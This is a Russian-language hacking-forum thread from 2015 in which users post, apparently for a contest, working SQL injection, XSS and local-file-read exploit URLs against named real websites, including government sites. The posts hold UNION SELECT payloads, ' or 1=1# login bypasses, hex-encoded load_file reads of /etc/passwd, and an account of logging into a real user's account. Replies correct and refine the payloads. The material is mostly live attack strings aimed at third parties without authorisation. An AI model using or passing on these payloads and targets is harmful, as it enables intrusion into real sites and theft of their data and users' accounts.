ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.06.2015, 23:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 15245
Репутация:
11
|
|
Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный , а то так бы и продолжал морально разлагаться и в игрушки играть.
|
|
|
|

29.06.2015, 14:03
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от semen6192
semen6192 said:
↑
1)Сайт:
http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт:
http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 --
2)Сайт:
http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт:
http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
3)Сайт:
http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт:
http://www.comtecwash.com/photos.php?id=-1
UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт:
http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт:
http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт:
http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт:
http://mapexpert.com.ua/index_ru.php...--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт:
http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт:
http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' )
SQL защитано, XSS нет, в конкурсе запрещены ru/ua
|
|
|

30.06.2015, 00:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 6419
Репутация:
2
|
|
1)Сайт: http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу: Online registred users:admin и т.д
2) Сайт: http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 --
3)Сайт: https://www.harptabs.com
Уязвимость: SQLi
Эксплойт: https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт: http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт: http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт: http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=
|
|
|
|

02.07.2015, 20:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 15245
Репутация:
11
|
|
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
|
|
|
|

02.07.2015, 21:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от 3nvY
3nvY said:
↑
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)
|
|
|

08.07.2015, 14:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
target:police.gov.bd
type:SQL Injection
version:5.1.69
Код:
Code:
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
|
|
|
|

08.07.2015, 14:46
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от semen6192
semen6192 said:
↑
1)Сайт:
http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт:
http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу:
Online registred users:
admin и т.д
2) Сайт:
http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт:
http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 --
3)Сайт:
https://www.harptabs.com
Уязвимость: SQLi
Эксплойт:
https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт:
http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт:
http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт:
http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт:
http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=
1) SQL в username, а не в поле пароля.
admin'or(1)='1
123
2) ОК
3) Не смог разлогиниться, удаление куков не помогло.
Тоже ошибся в каком-то из полей.
4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит.
5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.
|
|
|

10.07.2015, 04:09
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
XSS уязвимость
Код:
Code:
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
|
|
|

10.07.2015, 06:20
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
Сайт: http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.albit.com.au
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.apva.org
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.th.boots.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.shanson.biz
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.io-arch.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.tokaiguitar.de
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.florentina.ro
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.pronv.us
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.themasterswoodshop.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
|
|
|

10.07.2015, 06:31
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
Сайт: www.themasterswoodshop.com
Уязвимость: Local File Reading
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт: www.io-arch.com
Уязвимость: Local File Reading
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт: www.ravco.jp
Уязвимость: Local File Reading
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|